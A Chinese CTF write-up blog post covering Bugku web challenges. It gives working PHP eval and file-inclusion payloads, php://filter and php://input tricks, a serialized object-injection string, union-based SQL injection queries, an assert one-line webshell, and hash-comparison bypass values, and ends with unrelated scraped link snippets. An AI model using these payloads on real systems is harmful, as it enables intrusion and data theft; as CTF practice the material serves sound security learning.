冬瓜小暖
冬瓜小暖

bugku的题目

矛盾

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

题目要求输入的 不是一个数字或者数字字符串,但是值为1
可以采用 %00截断
知识点是 弱类型比较 当数字与字符串比较或者运算时,会把字符串转换为数字。
https://www.cnblogs.com/Mrsm1th/p/6745532.html
大佬的总结

web3

ascii->unicode

域名解析

令flag.baidu.com 解析到 123.206.87.240 即可
所以1更改hosts文件
2burp suite抓包后将host改为 flag.baidu.com

你必须让他停下

刚开始思路是JS的脚本设定不断刷新,所以我只需要关闭JS脚本,就可以得到答案。关闭后发现图片无法加载。
后试着刷新了几次,发现会返回不同的jpg
当放回10.jpg时会发现flag ,一个不显示的flag,但可以在网页源代码中查看到。

本地包含 **

 

    include "flag.php"; 

    $a = @$_REQUEST['hello']; 

    eval( "var_dump($a);"); 

    show_source(__FILE__); 

?>

includ->导入一个文件
$_request->可以接受get,post,cookie的传值
eval->执行("")里的字符串
show_source()->高亮显示一个文件的代码内容
var_dump() ->输出变量以及值
__ FIFE __->当前文件绝对路径

  1. ?hello=file(“flag.php”) -> 常见的包含方法
  2. ?hello=1);show_source(“flag.php”);var_dump(1
    因为show_source()不需要echo,会直接打印出来
    不局限于show_source()函数。还可以
    ?hello=1);$s=file(“flag.php”);print_r($s);var_dump(1
    只要可以把flag.php打印出来即可
    但是这里使用file_get_contents 与 echo搭配却失败了。
  3. $content = '' echo $content;当这段代码被打印,即echo后,会发现什么shabi输出失败,并且直接退出PHP程序 //题外话
    get传递的参数 ->?hello=1);include(@$_POST[‘z’]
    post 传递的参数z=php://filter/convert.base64-encode/resource=flag.php
    convert.base64,是PHP中的转换过滤器,在PHP5.0.0时添加的

变量1

flag In the variable !   

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

刚看到题目以为是道文件包含的题目,就试试 ?args=file(‘flag1.php’)
查看完代码后发现正则只匹配数字和字母并且最后有一个 $$args,还以为是打错了
$$arg 表示一个可变变量,令$arg=GLOBALS,就输出了超全局变量GLOBALS.(题目是提示flag在变量里)

web5

JSFUCK,一种js的加密。在控制台黏贴代码即可得到答案。注意看题干要求是大写。

头等舱

F12什么都没有,也没有提示。所以burp抓包,发现答案在回包中。

网站被黑

首先黑页是被人黑之后,别人挂上去的html,所以要找到原来的页面,用御剑后台扫描后。shell.php。只有密码框,使用burpsuite暴力破解出密码

管理员系统

第一眼以为是POST注入的题目
输入后发现提示 IP被记录,请使用本地管理员登陆。那么肯定就要用到
X-Forwarded-For:127.0.0.1 这个请求头部了,
后来在最后在F12末尾发现了一个加密的编码base64加密,解密后密码test123

web4**

对js代码了解较少。

flag在index里 **

第一步想的是先试试file=index.php,无法返回
下来想抓包,查看返回是不在响应中,无结果
第三步,百度
这道题与本地包含的题目是有些相似,但是他没有代码执行的eval函数,
并且题目中没有参数,需要自己通过get传递一个参数
所以应该采用php://filter的方式读取文件
?file=php://filter/convert.base64-encode/resource=index.php

<html>
    <title>Bugku-ctf</title>
    

	error_reporting(0);
	if(!$_GET[file]){echo 'click me? no';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

strstr ->返回某个字符以及以后的字符串
stristr ->不分大小写的返回
上述过滤方法遇到再了解。

输入密码查看flag

burp的暴力破解

点击一百万次**

JS代码了解较少

听说备份是个好习惯

先用御剑扫一下后台,有一个flag.php,里面什么都没有。
应该是文件备份,使用Dir-buster扫描后缀,后缀应该是.php.bak
也可多尝试常见的后缀。


include_once "flag.php"; //文件包含
ini_set("display_errors", 0); //不报错
$str = strstr($_SERVER['REQUEST_URI'], '?');  //返回?以后的内容
$str = substr($str,1); //返回位置1以及以后的内容,也就是去掉问号
$str = str_replace('key','',$str); //把关键字key用空格代替
parse_str($str); //比如传进来的是key=1,那么则变成$key=1
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){ //md5值相等,但是值不相等
echo $flag."取得flag";
}
?>

数组绕过和0e绕过。
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469

成绩单

与sqlilab1的注入区别不大。
先判断闭合为’#
再找判断字段数 1’ order by 4 #
再判断回显位 -1’ union select 5,6,7,8 #
爆出数据库名以及版本 -1’ union select 5,version(),database(),6 #
爆出表名
-1’ union select 1, group_concat(table_name),3,4 from information_schema.tables where table_schema=database() #
爆出列名
-1’ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘fl4g’ #
爆出具体值
-1’ union select 1,2,3,skctf_flag from fl4g #

秋名山老司机**

python request库不是很了解。

速度要快 **

python request库

Cookie欺骗*

看到题目以为是抓包取Cookie的题目。抓包后无果。
发现file=参数,参数通过base64解密后发现是keys.txt,还原后输入没有结果。
那就试试index.php(经过base64解密后)发现还是没有结果
还有另外一个参数line= 输入0,1,后发现会返回代码,应该是源代码的一行。
python request库还没有学,先去网上找了这段代码


 
error_reporting(0);  //不报错
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); 
//确定是否存在传进来的filename,存在就base64解密,否则就把空格解密
$line=isset($_GET['line'])?intval($_GET['line']):0; 
//同理,如果传进来line,整型化,否则就是0
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array( 
'0' =>'keys.txt',
'1' =>'index.php',
);
//如果$file是空格,就把header头显示再url框中,并确立一个数组file_list
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){       //看这里 
$file_list[2]='keys.php'; 
}  
//确定是否存在Cookie值,并且传进的Cookie值为margin,如果是就给$file_list新增一个键与值(也就是flag)
if(in_array($file, $file_list)){ 
$fa = file($file); 
echo $fa[$line]; 
}
//如果$file在$file_list,$fa的值就是文件$file,然后打印文件的第line行
?>

个人感觉最后输出的时候还是要枚py脚本枚举一下行数

never give up

看到?id=1 ,猜想是sql注入,试了几个常见的闭合,发现没有回显。
然后又猜解是爆破,burpsuite试了1-999没有返回。
在源代码里发现有一个1p.html,尝试访问,发现一个跳转。
所以burpsuite抓包。
明显的url加密与base64加密。注释部分是base64,解密后,发现还有一层url加密。
再次解密得到


if(!$_GET['id'])
{
    header('Location: hello.php?id=1');//如果没有id值传入,则返回一个头部
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))//返回字符串中的".",首次出现的位置
{
    echo 'no no no no no no no';   //如果没有 打印nonono,注意如果是首字母是.的话可以绕过
    return ;
}
$data = @file_get_contents($a,'r'); //读取$a内容为字符串
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    //$data的值为bugku is a nice plateform!
    //$id==0弱类型
    //$b长度小于5
    //忽略大小写的匹配字符111$b的首个字符串
    //$b的首个字符串$b的首字母不是4
    //eregi($pattern,$string)
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}
?>

require()是直接显示的函数,不需要赋值并且echo
所以满足的条件
id==0,也就是弱类型的相等,字符串即可
a的值需要是一个字符串,这个可以挂自己的服务器,也可以使用伪协议
php://input
b值我需要将匹配模式改变,也就是把4截取掉,可以采用00截断并且字符串的长度要大于5
所以payload
?id=bb&b=%0012345&a=php://input
post的内容 “bugku is a nice plateform!”
注意%00算一个字符。
php://可以访问请求中的原始数据流

welcome to bugkuctf

又是一道找不到的题目,去网上找到源码

  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"]; 
 
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!
";  
    include($file); //hint.php  ->这里有提示奥
}else{  
    echo "you are not admin ! ";  
}  
 ?>

使用?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php
post数据 -> welcome to the bugku
然后得到源码

    
class Flag{//flag.php    
    public $file;    
    public function __tostring(){    
        if(isset($this->file)){    
            echo file_get_contents($this->file);   
            echo "
";  
        return ("good");  
        }    
    }    
}    
?>

定义了一个类,这里有魔术方法tostring
这里意思就是打印出来实例化传入的字符串。
这里有个提示,flag.php
下来这个步骤是经验步骤
就是顺势查看index.php,将上面那个hint变成index.php
得到源码

    
$txt = $_GET["txt"];    
$file = $_GET["file"];    
$password = $_GET["password"];       
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){    
    echo "hello friend!
";    
    if(preg_match("/flag/",$file)){   
        echo "不能现在就给你flag哦";  
        exit();    
    }else{    
        include($file);     
        $password = unserialize($password);    
        echo $password;    
    }    
}else{    
    echo "you are not the number of bugku ! ";    
}     
?>

发现$file 变量不能有字符串flag,但是又必须读取flag.php。
正好可以通过hint.php
?txt=php://input&file=hint.php&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
post数据 -> welcome to the bugku

过狗一句话

题目在做的时候已经坏了,flag被删。


$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])
?>

这里用到了assert断言函数。
assert($string),字符串会被当做PHP代码执行,但是与eval本质上有区别
所以可以尝试读取目录
?s=print_r(scandir(’./’));
scandir返回一个 array,包含有 directory 中的文件和目录。
?s=print_r(glob("."))
glob -> 寻找与模式匹配的文件路径
匹配模式与shell相似

字符?正则?

先把正则表达式接出来,解出来后发现蛮复杂的,就以为是道假的正则题目。
但是尝试了一下,真的就是把id的构造一个传入

  
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?> key is: KEY{0x0SIOPh550afc}

/i 忽略大小写
key(0-无穷个任意字符)key(任意字符4到7个)key:/(任意字符一个)/(0-无穷个任意字符)key(a-中任意一个)(一个标点字符)

前女友(SKCTF)

又是一道找不到的题

if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

v1与v2值不相等但是md5值相等,可以考虑数组绕过和0e绕过
数组时md5()会返回0
v3与flag相等,结果需要返回一个1,也就是说strcmp要返回一个0,可以无法比较,然后返回一个false
所以
?v1[]=1&v2[]=2&v3[]=3

login1(SKCTF)

你从哪里来

are you from google?
之前有一个误区就是我把User-Agent改了,后来想了想才想起来User-Agent是你从什么浏览器中来的,
所以更改referer 参数就可
referer:https://www.google.com

md5 collision(NUPT_CTF)

题目提示
please input a
以为是POST方法传入一个a -> 返回原网页
尝试PUT方法传入一个 a -> 返回原网页。
尝试?a=1
返回false
题目名称md5 碰撞
所以
?a=0e545993274517709034328855841020 -> false!
?a=s878926199a
返回flag

程序员本地网站

这个题是要求本地访问
可用一个
X-Forwarded-For绕过

各种绕过

 
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
        die('Flag: '.$flag);
    else
        print 'sorry!';
}
?>

解读代码
id先进行url解密
然后要求uname值与passwd值不相等但是他们的sha1加密值相等
并且id值等于margin
id值直接传入即可,因为所有字符的的解密值都是本身。
下来使用数组绕过即可
即如果给sha1传入一个数组,返回值就是null
?id=margin&uname[]=1
post -> passwd[]=

WEB8


extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "
This is flag:" ." $flag
";
}
else
{
echo "
sorry!
";
}
}
?>

extract->可以直接考虑变量覆盖
使$ac===$f就可以
所以直接传参数
?ac=x&f=php://input
post数据 -> x
之前对file_get_contents()有误解,以为他也可以读字符串,后来才知道只能读文件。

细心

提示是想办法变成admin
进去后先对三个链接抓包看回包没有flag
扫描一下后台,发现robots.php
进入/resusl.php
根据提示
?x=admin

求getshell**(做一下uploadlab)

这个题目一看就是文件上传。
但他最奇怪的一点就是他的改包的时候
Content-Type: multipart/form-data;
需要绕过,也就是要有一个大写,可以Multipart/form-data
将filename改成1.php5
(按照提示的话应该改成margin.php5)

INSERT INTO注入

这是一个神奇的登录框

多次

PHP_encrypt_1(ISCCCTF)

文件包含2

flag.php

sql注入2

江湖魔头

js不会

login4

没写的要么题目不见了,要么不会,去看看PHP代码审计的视频和python脚本编写的视频再回来
:D

你可能感兴趣的:(CTF)

  • ARM驱动学习之4小结 JT灬新一 嵌入式C++arm开发学习linux
    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
  • react-intl——react国际化使用方案 苹果酱0567 面试题汇总与解析java开发语言中间件springboot后端
    国际化介绍i18n:internationalization国家化简称,首字母+首尾字母间隔的字母个数+尾字母,类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
  • Linux CTF逆向入门 蚁景网络安全 linux运维CTF
    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
  • Windows安装ciphey编码工具,附一道ciscn编码题例 im-Miclelson CTF工具网络安全
    TA是什么一款智能化的编码分析解码工具,对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位(最新的版本不兼容,32位的也不行)PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件,r修改成rb即可。使用标准语
  • 2005年高考英语北京卷 - 阅读理解C 让文字更美
    Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢?Zooofficialssaytheyareconcernedab
  • CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移 沧海一粟日尽其用 算法安全python
    CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息:7+1+0?格式bugku{xxxxx}密文:4nXna/V7t2LpdLI44mn0fQ==要求:破解密文获得flag2.解题思路2.1base64
  • CTF常见编码及加解密(超全)第二篇 不会代码的小徐 编码密码网络安全密码学预编码
    HTML实体编码简述:字符实体是用一个编号写入HTML代码中来代替一个字符,在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例:highlighter-HTML明文:hello,world.十进制:hello,world.十六进制:hel
  • CTF——web方向学习攻略 一则孤庸 CTF网络安全CTF
    1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
  • CTF——web总结 oliveira-time ctfweb安全
    解题思路做题先看源码关注可下载的资源(zip压缩包)抓包寻找可能存在的加密信息(base64)不管三七二十一先扫描目录再说ps:正常的应该是先扫描目录,然后发现后台进行爆破,发现爆破困难,然后去社工找其他信息。CTF——web个人总结_ctfweb-CSDN博客
  • VueTreeselect el-tree-select 多选 小小并不小 Vueelementjsvue.jsjavascript
    1、VueTreeselect是一个多选组件npminstall--save@riophae/vue-treeselect全部代码//importthecomponentimportTreeselectfrom'@riophae/vue-treeselect'//importthestylesimport'@riophae/vue-treeselect/dist/vue-treeselect.cs
  • ctf逆向解题——Bomb二进制炸弹 Funkypantss
    BombPhase1在输入阶段将由文件输入的字符存储在input中,在phase1,该阶段将原字符串存储到rdi中,调用pases_1函数进行字符串比较。image进入phase1函数,该函数将原字符串rdi与预先设定的字符串“BorderrelationswithCanadahaveneverbeenbetter.”(存储在rsi中)进行比较,用于比较的函数是strings_not_equal,
  • 【CTF】MISC常用工具集锦/使用方法简介 不会代码的小徐 misc网络安全测试工具
    前言#MISC题型多变而且工具繁杂,因此自己花时间整理了一份工具列表,以便日后参考用流畅地阅读这篇博客,你可能需要:Python2.7.18+Python3.8+任何一个更高版本的Python,使用conda管理Linux虚拟机,kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?),整合了多种脚本(base,字频分析,pn
  • 网络安全的相关比赛有哪些?需要掌握哪些必备技能? 网安学习 web安全安全网络安全的相关比赛有哪
    01、CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事
  • 第四部分:1---文件内核对象,文件描述符,输出重定向 S+叮当猫 LinuxCentOS算法linux服务器
    目录structfile内核对象:如何读写文件?文件描述符在文件描述符表中的分配规则:输出重定向初步解析:dup2实现复制文件描述符:structfile内核对象:structfile是在内核空间中创建的用于描述文件的结构体,每当一个文件被打开时,内核会为该文件创建一个对应的structfile结构体,并在文件描述符表中为其分配一个文件描述符。基于文件的定义(文件=内容+属性),structfil
  • 网络攻防WEB入门指南 youhao108 网络攻防web渗透测试网络安全网络攻防
    网络攻防WEB入门指南(大佬绕路)文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题,以及线下AWD攻防(AttackWith
  • 软考 - 系统架构设计师 - 设计模式 小林想被监督学习 系统架构设计师系统架构设计模式
    目录概念创建型设计模式抽象工厂模式(AbstractFactoryPattern)优点缺点应用场景总结构建器模式(BuilderPattern)优点缺点应用场景工厂方法模式(factorymethod)优点缺点应用场景原型模式(prototype)优点缺点应用场景单例模式(Singleton)优点缺点应用场景结构型设计模式适配器模式(Adapter)优点缺点应用场景桥接模式(Bridge)优点缺点
  • ctfshow web入门 ssrf web351~web360 kikkeve ctfshowphpweb安全安全
    目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery:服务器端请求伪造)就是让服务器去请求服务器的资源,因为我们远程请求不到。curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取
  • flutter 一键打出不同包名、应用名、版本名、签名、应用图标、版本号的安装包 Sindyue flutter
    1.build.gradle文件中配置不同的应用信息flavorDimensions"app"productFlavors{app1{//配置包名manifestPlaceholders=[str:"releaseStr",package_name:"com.example.demo1"]applicationId"com.example.demo1"versionCode1versionName
  • CTF 竞赛密码学方向学习路径规划 David Max CTF学习笔记密码学ctf信息安全
    目录计算机科学基础计算机科学概念的引入、兴趣的引导开发环境的配置与常用工具的安装WattToolkit(Steam++)、机场代理Scoop(Windows用户可选)常用Python库SageMathLinux小工具yafuOpenSSLMarkdown编程基础Python其他编程语言、算法与数据结构(可选)数学基础离散数学与抽象代数复杂性分析密码学的正式学习兴趣的培养做题小技巧系统学习需要了解并
  • MySQL8.0新特性~最左前缀匹配原则被打破了 进击的CJR mysqlmysql
    测试在MySQL8.0.25和mysql5.7.33中创建如下CREATETABLEt1(f1INTNOTNULL,f2INTNOTNULL,PRIMARYKEY(f1,f2));INSERTINTOt1VALUES(1,1),(1,2),(1,3),(1,4),(1,5),(2,1),(2,2),(2,3),(2,4),(2,5);INSERTINTOt1SELECTf1,f2+5FROMt1;
  • hackcon ctf 2018 | pwn wp fantasy_learner
    BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点,得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出,输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久,卡在了能否根据_d
  • BUUCTF 2021-10-4 Pwn Ch1lkat BUUCTFPwnlinuxpwn
    文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
  • C# 关于多线程同步不同实现方式 語衣 C#知识补充c#开发语言
    栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva
  • Android里的设计模式 jim_dayday_up #Android_基础知识设计模式java开发语言
    一:设计模式分类经典的23种设计模式是由ErichGamma、RichardHelm、RalphJohnson和JohnVlissides(合称“GangofFour”)在他们的书《设计模式:可复用面向对象软件的基础》中定义的。以下是这些设计模式的分类和简要介绍。1.1创建型模式单例模式(Singleton):确保一个类只有一个实例,并提供一个全局访问点。抽象工厂模式(AbstractFactor
  • 软考——简单记忆设计模式 Yeira 设计模式pythonjava
    抽象工厂模式(AbstractFactory):提供一个接口,可以创建一系列相关或相互依赖的对象,而无需指定它们具体的类。(一个接口创建相关对象,无需具体的类)构建器模式(Builder):将一个复杂类的表示与其构造相分离,使得相同的构建过程能够得出不同的表示。(相同是构造,不同的表示)工厂方法模式(FactoryMethod):定义一个创建对象的接口,但由子类决定需要实例化哪一个类。工厂方法使得
  • 【软考】设计模式之抽象工厂模式 王佑辉 软考设计模式软考
    目录1.说明2.应用场景3.结构图4.构成5.适用性6.优点7.缺点8.java示例1.说明1.提供一个创建一系列相关或相互依赖对象的接口,而无须指定它们具体的类。2.抽象工厂模式(AbstractFactoryPattern)是一种创建型设计模式。3.抽象工厂模式用于系统的产品族,而不仅仅是一个等级结构;一个等级的抽象类只能创建一个等级的产品,而抽象工厂模式能创建多个等级的产品。2.应用场景1.
  • 30、基于SelectFromModel和LassoCV的特征选择 凌晨思索
    30、基于SelectFromModel和LassoCV的特征选择importmatplotlib.pyplotaspltimportnumpyasnpfromsklearn.datasetsimportload_diabetesfromsklearn.feature_selectionimportSelectFromModelfromsklearn.linear_modelimportLasso
  • 【鸿蒙HarmonyOS开发笔记】使用@Preview装饰器预览组件 Luxine. 鸿蒙HarmonyOS开发笔记前端分享笔记华为harmonyos
    概述ArkTS应用/服务支持组件预览,要求compileSdkVersion为8或以上。组件预览支持实时预览,不支持动态图和动态预览。组件预览通过在组件前添加注解@Preview实现,在单个源文件中,最多可以使用10个@Preview装饰自定义组件。@Preview的使用参考如下示例@Preview({title:'FoodImage'})@ComponentstructFoodImageDisp
  • vue3+tesseract 图片文字提取 妙明元心 javascriptvue.jsecmascript
    github:https://github.com/naptha/tesseract.js可实现多语言识别,中英文混合识别demo如下:importTesseractfrom"tesseract.js"//方式1:Tesseract.recognize('http://localhost:5173/vue.jpg','eng+chi_sim',).then((d)=>{console.log(d.
  • iOS M1芯片Mac上Xcode模拟器报错解决 aven_kang
    真机编译可以通过,模拟器失败,出现以下错误...,buildingforiOSSimulator,butlinkinginobjectfilebuiltforiOS,file'...'或者couldnotfindmodulefortarget'x86_64-apple-ios-simulator'解决方案一1.添加arm64到项目PEROJECT和TARGETS的ExcludedArchitect
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
